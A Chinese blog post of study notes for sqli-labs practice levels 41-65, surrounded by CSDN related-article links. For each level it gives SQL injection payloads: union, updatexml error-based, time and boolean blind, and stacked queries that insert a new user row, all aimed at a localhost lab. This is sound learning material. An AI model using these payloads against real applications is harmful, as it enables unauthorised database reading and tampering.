sqli-labs(41-65)学习记录

已于 2024-05-12 15:46:56 修改
阅读量897 收藏 10
点赞数 22
分类专栏: sql注入 文章标签: 学习
于 2024-05-12 15:42:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60567444/article/details/138754248
版权

第四十一关

源码:

联合注入

?id=-1 union select 1,2,3

第四十二关

是一个登录界面

源码:

对输入的用户名进行了过滤但是对密码没有进行转义

堆叠注入

向users插入用户名和密码

login_user=admin&login_password=admin';insert into users(id,username,password) values ('66','xxy','123456')--+

报错注入

login_user=admin&login_password=admin' and updatexml(1,concat(0x7e,concat(database(),0x7e)),1)--

第四十三关

源码:

跟前一关一样就是闭合的方式不一样

login_user=admin&login_password=admin') and updatexml(1,concat(0x7e,concat(database(),0x7e)),1)--+

第四十四关

源码:

堆叠注入

login_user=1&login_password=a';insert into users values(66,'xxy','123456')#&mysubmit=Login

第四十五关

 与之前第四十三关一样

源码:

第四十六关 排序注入

源码:

报错注入

sql语句是order by,sql语句参数没有引号且不能使用联合注入

http://localhost/Less-46/?sort=0%20or%20updatexml(1,concat(0x7e,database(),0x7e),1)

第四十七关

源码:

就是闭合的方式不一样

http://localhost/Less-47/?sort=0%27%20or%20updatexml(1,concat(0x7e,database(),0x7e),1)--+

第四十八关

源码:

没有报错语句的输出那就不能使用报错注入

延时注入:

1 and if(length(database())=8,1,sleep(2))--+

第四十九关

源码:

闭合的方式不一样跟前一关一样

第五十关

源码:

和第四十六关一样,可以使用updatexml进行报错注入,还可以使用堆叠注入,因为使用了mysqli_multi_query函数,支持多条sql语句执行。也可以延时注入

?sort=0 or updatexml(1,concat(0x7e,concat(database(),0x7e)),1)

第五十一关

源码:

与前面一关一样 就是闭合的方式不一样

第五十二关

源码:

没有报错显示,只能堆叠注入或者延时注入

第五十三关

源码:

字符型,单引号闭合,没有报错显示,可以使用堆叠注入和延时注入

?sort=1'and if(length(database())=8,1,sleep(5))--+

第五十四关

源码:

单引号闭合

联合注入:

?id=-1'union select 1,2,3--+

判断数据库名:

?id=-1'union select 1,database(),3--+

第五十五关

源码:

有14次机会,id参数是加了括号的整数

?id=-1) union select 1,database(),3--+

第五十六关

源码:

跟前面一关的闭合不一样  其他都一样

第五十七关

源码:

闭合:

?id="union select 1,database(),3--+

第五十八关

源码:

页面中显示的数据不是直接数据库里面取得,而是在一个数组里面取出得。所以联合注入是不可以滴,可以使用报错注入

?id=1' and updatexml(1,concat(0x7e,database(),0x7e),1)--+

第五十九关

源码:

?id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)

第六十关

源码:

?id=1") and updatexml(1,concat(0x7e,database(),0x7e),1) --+

第六十一关

源码:

?id=1')) and updatexml(1,concat(0x7e,database(),0x7e),1)--+

第六十二关

源码:

可以使用布尔盲注和时间注入

?id=1') and if(length((select database()))=10,sleep(5),1)--+  时间注入,如果出现延迟表示该数据库名长度是10 
 
?id=1')and length((select database()))=10--+  布尔盲注

第六十三关

源码:

可以使用布尔盲注和时间注入

?id=1' and length((select database()))=10--+

第六十四关

源码:

?id=1)) and length((select database()))=10--+

第六十五关

源码:

跟之前的一样

我不懂e
关注
专栏目录
sqli-labs靶场练习笔记
11-09
### SQLi-Labs靶场练习笔记知识点概览 #### 一、SQL注入基本概念与原理 - **定义**:SQL注入是一种常见的应用层攻击方式,它利用编程中的漏洞,通过在应用程序的输入框中插入恶意SQL语句来控制后端数据库服务器。 -...
SQL注入sqli-labs手注+sqlmap
m0_63563528的博客
07-19 2270
第一周:SQL注入学习
sqli-labs通关攻略教程——堆叠注入+排序注入(less38~less65)
m0_55854679的博客
08-15 810
文章目录less 38方法1——报错注入联合注入堆叠注入less 39less 40联合注入堆叠注入less 41less 42报错注入堆叠注入less 43less 44less 45less 46报错注入时间盲注less 47less 48less 49less 50堆叠注入报错注入less 51less 52less 53less 54less 55less 56less 57less 58less 59less 60less 61less 62less 63less 64less 65 less 3
SQLi-labs靶场(41-50)过关超详细0基础
最新发布
m0_67803321的博客
07-30 915
sqli-labs靶场第41-50关过关过程详解
sqli.labs靶场(41-53关)
喜欢创作各种技术类文章,希望可以帮到你
02-04 1041
可以使用布尔盲注POC:123')+or+substr(database(),1,1)='a'--+可以用布尔盲注,POC:123'+or+lenth(database())=1--+这关login_password是单引号闭合,可用布尔盲注。POC:111')--+,有报错信息,可以用报错注入。应该是报错了,一共三个字段,不显示错误可以用时间盲注。和48关差不多,也是时间盲注,需要单引号闭合。有报错信息,还得报错注入,单引号闭合。没有报错信息,得用盲注,时间盲注。单引号闭合,没有报错,还得是盲注。
堆叠注入详解
weixin_30271335的博客
09-29 194
0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。 0x01 堆叠注入原理 在...
sqli-labs靶场
05-30
"sqli-labs靶场"是一个专门用于学习和测试SQL注入技术的平台,它提供了多种不同类型的SQL注入场景,帮助安全研究人员和开发人员了解并防御这种攻击。 在sqli-labs靶场中,用户可以实践各种SQL注入技巧,如错误注入...
sqli-labs实验环境
05-08
`sqli-labs`是一个专门用于学习和实践SQL注入的实验环境,它提供了多种类型的SQL注入漏洞场景,包括但不限于盲注、时间延迟注入、宽字节注入、联合查询注入等。通过这些实验,初学者可以深入了解SQL注入的原理,掌握...
sqli-labs-php7-master.zip
04-06
在这个背景下,"sqli-labs-php7-master.zip"是一个专为Web安全学习者设计的练习平台,它专注于SQL注入SQL Injection)这一重要的攻击手段。这个压缩包包含了一个名为"sqli-labs-php7-master"的项目,用于模拟各种...
sqli-labs-master
08-22
sqli-labs-master是一个专为学习和实践SQL注入漏洞利用而设计的代码环境。这个项目提供了一系列逐步升级的练习,帮助用户了解SQL注入的工作原理、检测方法以及如何修复这些漏洞。 在sqli-labs-master中,你可以探索...
sqli-lib64关闯关笔记学习资料.zip
08-22
sqli-labs-1-65閫氬叧鏁欑▼share(by sm0nk).md》这个文件很可能包含了作者sm0nk在完成sqli-lib64所有65关的过程中所记录的笔记和技巧。通过阅读这份文档,你可以了解到每个关卡的关键思路、解题方法以及可能遇到...
sqli-labs-master靶场
07-14
sqli-labs-master靶场是一个专门设计用于学习和测试SQL注入技术的平台。这个靶场包含了多个级别,每个级别代表一种特定的SQL注入漏洞类型,帮助用户从基础到高级逐步掌握SQL注入的防范与解决方法。 在SQL注入攻击中...
sqli-labs视频
02-23
SQL注入SQL Injection)是一种常见的...通过观看sqli-labs视频系列,学习者能够深入理解SQL注入的原理,掌握检测和防御技巧,并熟悉实际的攻击方法。这些知识对于构建安全的Web应用程序和提高网络安全意识至关重要。
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
### SQLi-LABS Page-1 (Basic Challenges)1-22 知识点解析 #### 第一关:Less-1 - 字符型注入 在这一关卡中,我们需要找到一个可注入点,并通过该点执行SQL注入攻击。具体步骤如下: 1. **访问靶场**: - 访问...
sqli-labs-master-master.zip
07-18
在本文中,我们将深入探讨SQL注入的基本概念、工作原理,以及如何通过"SQLi-labs"这个靶场进行实践学习SQL注入通常发生在网站应用程序中,当应用程序没有正确地过滤用户输入,使得恶意的SQL命令可以被数据库执行...
sqli-labs通关全解----堆叠注入---38~45---11
cyynid的博客
01-13 473
本文引入一个新的概念:堆叠注入Stackedinjections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令行中,每一条语句结尾加;表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在;结束一个sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入
(手工)【sqli-labs40、41堆叠注入、盲注
07-15 1717
SQL-堆叠、盲注】
Sqli-labs Less38-45 堆叠注入
kevinhanser
08-10 712
本文记录 SQL 注入学习过程,资料为 SQLi SQLi 博客目录 Less - 38: GET- Stacked Query Injection - String 源代码 $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 测试 http://10.10.10.137/sqli-labs/Less-38/?id=...
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入学习过程...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值